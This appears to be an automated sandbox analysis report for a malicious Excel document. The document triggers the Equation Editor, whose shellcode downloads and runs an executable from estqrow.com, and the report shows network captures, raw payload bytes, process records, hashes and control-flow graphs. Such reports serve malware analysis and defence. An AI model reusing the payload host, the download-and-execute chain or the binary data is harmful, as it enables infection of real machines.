              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Oct 10, 2024 09:43:35.986269951 CEST8.8.8.8192.168.2.220x3591No error (0)estqrow.com154.38.177.76A (IP address)IN (0x0001)false
              • estqrow.com
              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.2249161154.38.177.764433504C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
              TimestampBytes transferredDirectionData
              2024-10-10 07:43:36 UTC308OUTGET /rt/vss.exe HTTP/1.1
              Accept: */*
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: estqrow.com
              Connection: Keep-Alive
              2024-10-10 07:43:36 UTC436INHTTP/1.1 200 OK
              etag: "7600-670678e6-86106c;;;"
              last-modified: Wed, 09 Oct 2024 12:36:54 GMT
              content-type: application/x-executable
              content-length: 30208
              accept-ranges: bytes
              date: Thu, 10 Oct 2024 07:43:36 GMT
              server: LiteSpeed
              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              connection: close
              2024-10-10 07:43:36 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 6b 46 0a 59 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 3c 00 00 00 36 00 00 00 00 00 00 8e 5b 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 00 00 00 04 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELkFY<6[ `@ `
              2024-10-10 07:43:36 UTC13824INData Raw: 00 00 00 00 6b 46 0a 59 00 00 00 00 02 00 00 00 1c 01 00 00 1c 60 00 00 1c 40 00 00 52 53 44 53 27 25 36 5c 2b d9 17 49 b4 24 24 04 20 03 d4 cb 01 00 00 00 46 3a 5c 50 65 6e 64 72 69 76 65 72 5c 70 72 6f 67 72 61 6d 61 73 5c 63 72 63 20 76 62 2e 6e 65 74 5c 54 65 73 74 65 20 4f 6b 5c 54 65 73 74 65 20 4f 6b 5c 6f 62 6a 5c 44 65 62 75 67 5c 54 65 73 74 65 4f 6b 2e 70 64 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Data Ascii: kFY`@RSDS'%6\+I$$ F:\Pendriver\programas\crc vb.net\Teste Ok\Teste Ok\obj\Debug\TesteOk.pdb


              Click to jump to process

              Click to jump to process

              Click to dive into process behavior distribution

              Click to jump to process

              Target ID:0
              Start time:03:42:44
              Start date:10/10/2024
              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              Wow64 process (32bit):false
              Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
              Imagebase:0x13ffc0000
              File size:28'253'536 bytes
              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:false

              Target ID:1
              Start time:03:43:33
              Start date:10/10/2024
              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
              Wow64 process (32bit):true
              Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Imagebase:0x400000
              File size:543'304 bytes
              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:4
              Start time:03:43:35
              Start date:10/10/2024
              Path:C:\Users\user\AppData\Local\Temp\opponbvew.exe
              Wow64 process (32bit):false
              Commandline:C:\Users\user\AppData\Local\Temp\opponbvew.exe
              Imagebase:0xcd0000
              File size:30'208 bytes
              MD5 hash:F5435E421FF6FCFC359478B4CF638358
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Antivirus matches:
              • Detection: 7%, ReversingLabs
              • Detection: 7%, Virustotal, Browse
              Reputation:low
              Has exited:true

              Reset < >

                Execution Graph

                Execution Coverage:12.5%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:52.5%
                Total number of Nodes:59
                Total number of Limit Nodes:5
                execution_graph 528 3610614 ExitProcess 547 361062d 528->547 530 3610620 565 3610649 530->565 548 3610633 547->548 549 3610649 8 API calls 548->549 552 361063a 549->552 550 3610682 551 36106c9 554 361072a 4 API calls 551->554 557 3610733 551->557 552->550 552->551 553 3610662 552->553 553->550 555 361066a 553->555 556 36106dc 553->556 562 36106ec URLDownloadToFileW 554->562 560 36106ac 7 API calls 555->560 561 361072a 4 API calls 556->561 556->562 558 3610775 3 API calls 557->558 559 361076d 557->559 558->559 559->530 560->550 561->562 562->557 564 3610747 3 API calls 562->564 564->557 566 361064f 565->566 587 3610670 566->587 588 3610673 587->588 589 36106ac 7 API calls 588->589 590 3610682 589->590 486 36106ac 487 36106ae 486->487 490 36106c1 LoadLibraryW 487->490 489 36106b3 500 36106db 490->500 492 36106c8 493 3610733 492->493 509 361072a URLDownloadToFileW 492->509 495 361076d 493->495 518 3610775 493->518 495->489 497 36106ec URLDownloadToFileW 497->493 514 3610747 497->514 501 36106dc 500->501 502 361072a 4 API calls 501->502 503 36106ec URLDownloadToFileW 501->503 502->503 505 3610747 3 API calls 503->505 507 3610733 503->507 505->507 506 361076d 506->492 507->506 508 3610775 3 API calls 507->508 508->506 510 3610747 3 API calls 509->510 511 3610733 510->511 512 3610775 3 API calls 511->512 513 361076d 511->513 512->513 513->497 515 361074a 514->515 516 3610775 3 API calls 515->516 517 361076d 516->517 517->493 519 3610778 WinExec 518->519 524 3610795 519->524 521 3610789 522 36107d0 521->522 523 3610798 ExitProcess 521->523 522->495 525 3610798 ExitProcess 524->525 526 361079c GetPEB 527 36107aa 526->527

                Callgraph

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 0 36106c1-36106cd LoadLibraryW call 36106db 4 361073d-361073e 0->4 5 36106cf-361072c call 361072a URLDownloadToFileW 0->5 6 3610740 4->6 7 36107ac-36107b1 4->7 47 3610733-361073c 5->47 48 361072e call 3610747 5->48 11 3610742-3610743 6->11 12 36107ab 6->12 9 36107b3-36107b7 call 36107c4 7->9 10 36107d7-36107db 7->10 17 36107b9-36107bb 9->17 15 36107de 10->15 16 3610745-361076e call 3610775 11->16 11->17 12->7 23 36107e0-36107e4 15->23 24 36107e6-36107ea 15->24 16->12 21 36107aa 17->21 22 36107bd-36107c1 17->22 21->7 23->24 27 36107f2-36107f9 23->27 28 36107ec-36107f0 24->28 29 36107ff-3610801 24->29 30 36107fb 27->30 31 36107fd 27->31 28->27 28->29 34 3610811-3610812 29->34 30->29 31->29 37 3610803-361080c 31->37 37->34 39 36107d0-36107d3 37->39 41 36107d5-36107d8 39->41 42 361080e 39->42 41->37 44 36107da 41->44 42->34 44->15 47->4 48->47
                APIs
                • LoadLibraryW.KERNEL32(036106B3), ref: 036106C1
                  • Part of subcall function 036106DB: URLDownloadToFileW.URLMON(00000000,036106EC,?,00000000,00000000), ref: 0361072C
                Memory Dump Source
                • Source File: 00000001.00000002.468180614.0000000003610000.00000004.00000020.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_3610000_EQNEDT32.jbxd
                Similarity
                • API ID: DownloadFileLibraryLoad
                • String ID:
                • API String ID: 2776762486-0
                • Opcode ID: 87853e6f9012fc364849630fcfd325975bd2840281cc665558faa9fca4197ae1
                • Instruction ID: a8cefdca6c1e08ad92ff2eca33debde9038c6c466e9439e84d9822c37ade3a7f
                • Opcode Fuzzy Hash: 87853e6f9012fc364849630fcfd325975bd2840281cc665558faa9fca4197ae1
                • Instruction Fuzzy Hash: 1A110A6240C3C13BCF12D2704D6EB66BF247B43610F1CCBCEE091091D393A492A5CA9A

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 49 3610775-361078c WinExec call 3610795 54 36107de 49->54 55 361078e 49->55 58 36107e0-36107e4 54->58 59 36107e6-36107ea 54->59 56 3610790-361079a ExitProcess 55->56 57 36107ff-3610801 55->57 60 3610811-3610812 57->60 58->59 62 36107f2-36107f9 58->62 59->57 63 36107ec-36107f0 59->63 64 36107fb 62->64 65 36107fd 62->65 63->57 63->62 64->57 65->57 66 3610803-361080c 65->66 66->60 68 36107d0-36107d3 66->68 69 36107d5-36107d8 68->69 70 361080e 68->70 69->66 71 36107da 69->71 70->60 71->54
                APIs
                • WinExec.KERNEL32(?,00000001), ref: 03610782
                  • Part of subcall function 03610795: ExitProcess.KERNEL32(00000000), ref: 0361079A
                Memory Dump Source
                • Source File: 00000001.00000002.468180614.0000000003610000.00000004.00000020.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_3610000_EQNEDT32.jbxd
                Similarity
                • API ID: ExecExitProcess
                • String ID:
                • API String ID: 4112423671-0
                • Opcode ID: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
                • Instruction ID: cc4833e638c0cee356919aa9180c25b586d46539cf6fa833e153cd98582b7334
                • Opcode Fuzzy Hash: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
                • Instruction Fuzzy Hash: 0DF0286B98835211CF70F228895C7EBBF59EF51710FCC8857D8A144545E86890F38FAE

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 72 3610649-3610657 call 3610815 call 3610670 77 36106c9-36106cd 72->77 78 3610659-361065e 72->78 79 361073d-361073e 77->79 80 36106cf-36106d0 77->80 78->77 81 3610660 78->81 82 3610740 79->82 83 36107ac-36107b1 79->83 84 36106d1-36106e7 call 361072a 80->84 81->84 85 3610662-3610666 81->85 88 3610742-3610743 82->88 89 36107ab 82->89 86 36107b3-36107b7 call 36107c4 83->86 87 36107d7-36107db 83->87 99 36106ec-361072c URLDownloadToFileW 84->99 91 3610668 85->91 92 36106bb-36106bf 85->92 98 36107b9-36107bb 86->98 96 36107de 87->96 97 3610745-361076e call 3610775 88->97 88->98 89->83 93 361066a-36106b8 call 36106ac 91->93 94 36106dc-36106e6 91->94 93->92 94->99 119 36106e7 call 361072a 94->119 104 36107e0-36107e4 96->104 105 36107e6-36107ea 96->105 97->89 102 36107aa 98->102 103 36107bd-36107c1 98->103 138 3610733-361073c 99->138 139 361072e call 3610747 99->139 102->83 104->105 110 36107f2-36107f9 104->110 111 36107ec-36107f0 105->111 112 36107ff-3610801 105->112 113 36107fb 110->113 114 36107fd 110->114 111->110 111->112 117 3610811-3610812 112->117 113->112 114->112 123 3610803-361080c 114->123 119->99 123->117 126 36107d0-36107d3 123->126 129 36107d5-36107d8 126->129 130 361080e 126->130 129->123 133 36107da 129->133 130->117 133->96 138->79 139->138
                APIs
                • URLDownloadToFileW.URLMON(00000000,036106EC,?,00000000,00000000), ref: 0361072C
                Memory Dump Source
                • Source File: 00000001.00000002.468180614.0000000003610000.00000004.00000020.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_3610000_EQNEDT32.jbxd
                Similarity
                • API ID: DownloadFile
                • String ID:
                • API String ID: 1407266417-0
                • Opcode ID: db9a6a276a87f18662c6dddb0a92bc5057a3ad76aec8a8b553dc13e51de27ded
                • Instruction ID: 0a0b746aad4c383616ab446ae61bde0e88f4f80390f96722700db3e779ab5769
                • Opcode Fuzzy Hash: db9a6a276a87f18662c6dddb0a92bc5057a3ad76aec8a8b553dc13e51de27ded
                • Instruction Fuzzy Hash: 9B31D1A240C7C56FDF12D7305E6E756BF247B83210F1CC68EE4D50A1A3D3A492B5C696

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 143 36106db-36106e6 146 36106ec-361072c URLDownloadToFileW 143->146 147 36106e7 call 361072a 143->147 157 3610733-361073e 146->157 158 361072e call 3610747 146->158 147->146 160 3610740 157->160 161 36107ac-36107b1 157->161 158->157 164 3610742-3610743 160->164 165 36107ab 160->165 162 36107b3-36107b7 call 36107c4 161->162 163 36107d7-36107db 161->163 169 36107b9-36107bb 162->169 167 36107de 163->167 168 3610745-361076e call 3610775 164->168 164->169 165->161 173 36107e0-36107e4 167->173 174 36107e6-36107ea 167->174 168->165 171 36107aa 169->171 172 36107bd-36107c1 169->172 171->161 173->174 176 36107f2-36107f9 173->176 177 36107ec-36107f0 174->177 178 36107ff-3610801 174->178 179 36107fb 176->179 180 36107fd 176->180 177->176 177->178 182 3610811-3610812 178->182 179->178 180->178 184 3610803-361080c 180->184 184->182 185 36107d0-36107d3 184->185 186 36107d5-36107d8 185->186 187 361080e 185->187 186->184 188 36107da 186->188 187->182 188->167
                Memory Dump Source
                • Source File: 00000001.00000002.468180614.0000000003610000.00000004.00000020.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_3610000_EQNEDT32.jbxd
                Similarity
                • API ID: DownloadFile
                • String ID:
                • API String ID: 1407266417-0
                • Opcode ID: bfd2141196d56e8ea153a337d2f95c3d2f22cda57215beb12cebed30854a76bc
                • Instruction ID: bd89dbf4b0393eec812ba55ed2faba7a7ddf2e8eb04c06e6c99ab52cb6c69fc8
                • Opcode Fuzzy Hash: bfd2141196d56e8ea153a337d2f95c3d2f22cda57215beb12cebed30854a76bc
                • Instruction Fuzzy Hash: 5811A06294C3D12BCF22D7704D6EB66BE257B82610F1CCBCEE1950A0D2E3A591A1CA56

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 189 361072a-361072e URLDownloadToFileW call 3610747 191 3610733-361073e 189->191 193 3610740 191->193 194 36107ac-36107b1 191->194 197 3610742-3610743 193->197 198 36107ab 193->198 195 36107b3-36107b7 call 36107c4 194->195 196 36107d7-36107db 194->196 202 36107b9-36107bb 195->202 200 36107de 196->200 201 3610745-361076e call 3610775 197->201 197->202 198->194 206 36107e0-36107e4 200->206 207 36107e6-36107ea 200->207 201->198 204 36107aa 202->204 205 36107bd-36107c1 202->205 204->194 206->207 209 36107f2-36107f9 206->209 210 36107ec-36107f0 207->210 211 36107ff-3610801 207->211 212 36107fb 209->212 213 36107fd 209->213 210->209 210->211 215 3610811-3610812 211->215 212->211 213->211 217 3610803-361080c 213->217 217->215 218 36107d0-36107d3 217->218 219 36107d5-36107d8 218->219 220 361080e 218->220 219->217 221 36107da 219->221 220->215 221->200
                APIs
                • URLDownloadToFileW.URLMON(00000000,036106EC,?,00000000,00000000), ref: 0361072C
                Memory Dump Source
                • Source File: 00000001.00000002.468180614.0000000003610000.00000004.00000020.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_3610000_EQNEDT32.jbxd
                Similarity
                • API ID: DownloadFile
                • String ID:
                • API String ID: 1407266417-0
                • Opcode ID: fe65dfc41c474ed7c68a25bdd3244d0e817b4e5dc4d84330f277ae402f48056e
                • Instruction ID: b95894500eeef1031f6be4405c640118ceae9237fff97d25fd2d2bfd91cce9c2
                • Opcode Fuzzy Hash: fe65dfc41c474ed7c68a25bdd3244d0e817b4e5dc4d84330f277ae402f48056e
                • Instruction Fuzzy Hash: 09114C335443417ACF20E6548D4DBAAFB65FF82710F5CC45AE1A0491D5E6A0D4E38E29

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 222 3610795-361079a ExitProcess
                APIs
                • ExitProcess.KERNEL32(00000000), ref: 0361079A
                Memory Dump Source
                • Source File: 00000001.00000002.468180614.0000000003610000.00000004.00000020.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_3610000_EQNEDT32.jbxd
                Similarity
                • API ID: ExitProcess
                • String ID:
                • API String ID: 621844428-0
                • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                • Instruction Fuzzy Hash:

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 224 361079c-36107a7 GetPEB 225 36107aa-36107b1 224->225 227 36107b3-36107bb call 36107c4 225->227 228 36107d7-36107db 225->228 227->225 241 36107bd-36107c1 227->241 230 36107de 228->230 232 36107e0-36107e4 230->232 233 36107e6-36107ea 230->233 232->233 235 36107f2-36107f9 232->235 236 36107ec-36107f0 233->236 237 36107ff-3610801 233->237 238 36107fb 235->238 239 36107fd 235->239 236->235 236->237 240 3610811-3610812 237->240 238->237 239->237 242 3610803-361080c 239->242 242->240 243 36107d0-36107d3 242->243 244 36107d5-36107d8 243->244 245 361080e 243->245 244->242 246 36107da 244->246 245->240 246->230
                Memory Dump Source
                • Source File: 00000001.00000002.468180614.0000000003610000.00000004.00000020.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_3610000_EQNEDT32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                • Instruction ID: a268086cb001b22fe9e01b41951447719a500ed92768d892a4685efecf8442ad
                • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                • Instruction Fuzzy Hash: 08D09276212502DFD705EB14CA98E56F36AFFD8611B28C268E5044B76AD730E8E2CB94

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 247 3610614-361062f ExitProcess call 361062d 250 3610631 247->250 251 3610632-361063b call 3610649 247->251 250->251 254 361068e-36106a8 251->254 255 361063e 251->255 261 36106ab-36106ad 254->261 257 3610640-3610643 255->257 258 36106af-36106b8 255->258 260 3610646 257->260 257->261 265 36106bb-36106bf 258->265 264 3610648-3610657 260->264 260->265 261->258 267 36106c9-36106cd 264->267 268 3610659-361065e 264->268 269 361073d-361073e 267->269 270 36106cf-36106d0 267->270 268->267 271 3610660 268->271 272 3610740 269->272 273 36107ac-36107b1 269->273 274 36106d1-36106e7 call 361072a 270->274 271->274 275 3610662-3610666 271->275 278 3610742-3610743 272->278 279 36107ab 272->279 276 36107b3-36107b7 call 36107c4 273->276 277 36107d7-36107db 273->277 288 36106ec-361072c URLDownloadToFileW 274->288 275->265 281 3610668 275->281 287 36107b9-36107bb 276->287 285 36107de 277->285 286 3610745-361076e call 3610775 278->286 278->287 279->273 282 361066a-361068b call 36106ac 281->282 283 36106dc-36106e6 281->283 282->254 283->288 308 36106e7 call 361072a 283->308 293 36107e0-36107e4 285->293 294 36107e6-36107ea 285->294 286->279 291 36107aa 287->291 292 36107bd-36107c1 287->292 322 3610733-361073c 288->322 323 361072e call 3610747 288->323 291->273 293->294 299 36107f2-36107f9 293->299 300 36107ec-36107f0 294->300 301 36107ff-3610801 294->301 302 36107fb 299->302 303 36107fd 299->303 300->299 300->301 306 3610811-3610812 301->306 302->301 303->301 312 3610803-361080c 303->312 308->288 312->306 314 36107d0-36107d3 312->314 316 36107d5-36107d8 314->316 317 361080e 314->317 316->312 319 36107da 316->319 317->306 319->285 322->269 323->322
                APIs
                • ExitProcess.KERNEL32(03610602), ref: 03610614
                Memory Dump Source
                • Source File: 00000001.00000002.468180614.0000000003610000.00000004.00000020.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_3610000_EQNEDT32.jbxd
                Similarity
                • API ID: ExitProcess
                • String ID:
                • API String ID: 621844428-0
                • Opcode ID: c48cc5852e321cc9baad89d4f3539fb5fb54d3e7d3f19564f978416fd55ab457
                • Instruction ID: 65bd60803c59917adacec75cc7aa462ec1dd7e35230b2eb3ed6a839b9d072227
                • Opcode Fuzzy Hash: c48cc5852e321cc9baad89d4f3539fb5fb54d3e7d3f19564f978416fd55ab457
                • Instruction Fuzzy Hash: 8811C09682E7C45FDF12E3305E6D145BF6069A3100B1C85CFD0D44E1A3D65896BAD3D6
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.477848922.000007FE8B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B6F0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7fe8b6f0000_opponbvew.jbxd
                Similarity
                • API ID:
                • String ID: 8$s$8$s$8$s$8$s$h.s${p
                • API String ID: 0-2167935294
                • Opcode ID: e8e7c3c54636caf4818fe68ff74e7357bfe920159a5579838f6597e449d419f4
                • Instruction ID: d43b8eadaae829d18b6a0e231c422b42f4d5a2b3ee96fcf1263e5e6bead8b1c2
                • Opcode Fuzzy Hash: e8e7c3c54636caf4818fe68ff74e7357bfe920159a5579838f6597e449d419f4
                • Instruction Fuzzy Hash: 3122DF30A09A4D8FDB95EF18C898BA9B7F1FF69301F5104A9A41DD7266CA31ED91CF40
                Memory Dump Source
                • Source File: 00000004.00000002.477848922.000007FE8B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B6F0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7fe8b6f0000_opponbvew.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7599c5d033d536050a1ee8772cda5cd5dee1afd8e8a5af23596abd6aff075f91
                • Instruction ID: ce5967fd599dea93283612e46ee36aadcfc9fe8a0ddd0e8ec07118febafa8c55
                • Opcode Fuzzy Hash: 7599c5d033d536050a1ee8772cda5cd5dee1afd8e8a5af23596abd6aff075f91
                • Instruction Fuzzy Hash: E3C19B34A09A1D8FDB94EF18C898BA973F1FF69301F4114A9A41DD7266CA75ED81CF00
                Memory Dump Source
                • Source File: 00000004.00000002.477848922.000007FE8B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B6F0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7fe8b6f0000_opponbvew.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f1b2c849d2fed48709bde757fb798477c2dd3099b922301064db9aabc1c993e1
                • Instruction ID: c735166a77f71158ddd80ef45383c33eeee80c276619f87015664818b1beb8ce
                • Opcode Fuzzy Hash: f1b2c849d2fed48709bde757fb798477c2dd3099b922301064db9aabc1c993e1
                • Instruction Fuzzy Hash: 2741F774908A4D8FDB95EF6CC898BA97BF1FF69301F0505A9E449DB261CB70E851CB40
                Memory Dump Source
                • Source File: 00000004.00000002.477848922.000007FE8B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B6F0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7fe8b6f0000_opponbvew.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: df28a530e55e9d4f8d0a7d1e303d77c27a1ef07501295b536bcd5fb4479c7fa4
                • Instruction ID: 125172d9715356232fd849d368a33158b04e7db5c9f5552e800a615cfa30f9f3
                • Opcode Fuzzy Hash: df28a530e55e9d4f8d0a7d1e303d77c27a1ef07501295b536bcd5fb4479c7fa4
                • Instruction Fuzzy Hash: AC41E630A05A1D8FDB98EF28C884BAA73B1FF59341F4154A9E45DC7261CA75ED91CB40
                Memory Dump Source
                • Source File: 00000004.00000002.477848922.000007FE8B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B6F0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7fe8b6f0000_opponbvew.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4d7bfbf994d830aa1fcbc5e772fe1d3cd72f252561e7b977f4cec05bed18434b
                • Instruction ID: 4d96af101aa74e7212a6b8545c218d3355fc7e2d70a82370139d23b82800b774
                • Opcode Fuzzy Hash: 4d7bfbf994d830aa1fcbc5e772fe1d3cd72f252561e7b977f4cec05bed18434b
                • Instruction Fuzzy Hash: 8C41A474A04A4D8FDB85EF6CC898AAD77F1FF69311F0505AAE409EB261CB70E851CB40
                Memory Dump Source
                • Source File: 00000004.00000002.477848922.000007FE8B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B6F0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7fe8b6f0000_opponbvew.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d11cf2a5be932168026332d63b218181ef5e97c9302884dc0eef160b24e7d713
                • Instruction ID: d7ee38877d77c3c099b8df5eff0c4d9a3dc46610a63759a666c86151ce415741
                • Opcode Fuzzy Hash: d11cf2a5be932168026332d63b218181ef5e97c9302884dc0eef160b24e7d713
                • Instruction Fuzzy Hash: F6411A74A09A4E8FDF94EF18C885BA977F0FF69301F4510A9E44ED7262CA34E984CB00
                Memory Dump Source
                • Source File: 00000004.00000002.477848922.000007FE8B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B6F0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7fe8b6f0000_opponbvew.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fce36c186aedb3350dd82c7ccd4bd97139bbefb155d06212366d0aa167e8b1e4
                • Instruction ID: 5191e19d95de55c20e68351abd5942288f8ac824c95073a5aee41675c0742dc3
                • Opcode Fuzzy Hash: fce36c186aedb3350dd82c7ccd4bd97139bbefb155d06212366d0aa167e8b1e4
                • Instruction Fuzzy Hash: 3341A234909A5D8FDB94EF18C888BA973F1FF69301F4104A9A41DD7261CB75AE80CF00
                Memory Dump Source
                • Source File: 00000004.00000002.477848922.000007FE8B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B6F0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7fe8b6f0000_opponbvew.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ae9f65dfc392420714d68e42abca73b71d2ee0b27b823fc97cd1eb7ffc83bc10
                • Instruction ID: 0abfd22fdfe3fd8d4720f0855f19bb676325f68e0bbce7561ac09d715bf97262
                • Opcode Fuzzy Hash: ae9f65dfc392420714d68e42abca73b71d2ee0b27b823fc97cd1eb7ffc83bc10
                • Instruction Fuzzy Hash: 07414F34A44A1D8FDB94EF18C898BA9B7B1FB69301F4115E9A41DD7262CB71ED81CF40
                Memory Dump Source
                • Source File: 00000004.00000002.477848922.000007FE8B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B6F0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7fe8b6f0000_opponbvew.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: aa9b6890e7dff1d7430e482d093ea75635c860affb3b384b6a89b9a26d911302
                • Instruction ID: 668b40276a5a3726982d61e03b20078bdf3806ef1682bf6fdd4a059f2bff7de2
                • Opcode Fuzzy Hash: aa9b6890e7dff1d7430e482d093ea75635c860affb3b384b6a89b9a26d911302
                • Instruction Fuzzy Hash: F131CF3085D68E9FEB41FF2898546A9BBA1FF46304F4124AAA45DC72F3DA349964C701
                Memory Dump Source
                • Source File: 00000004.00000002.477848922.000007FE8B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B6F0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7fe8b6f0000_opponbvew.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 42f263e0dab3396d96c8d88d68c3bc84415510fd2e2475635765e198ef586681
                • Instruction ID: 5d493aa2b8fc2afaee73f6ec815e8ea5c8a8585fe9a169357877c4d63666a32d
                • Opcode Fuzzy Hash: 42f263e0dab3396d96c8d88d68c3bc84415510fd2e2475635765e198ef586681
                • Instruction Fuzzy Hash: 8231A03094868E8FDB41EF28D8447EA7BF1FF4A340F0445AAE45DC72A2C775A951CB41
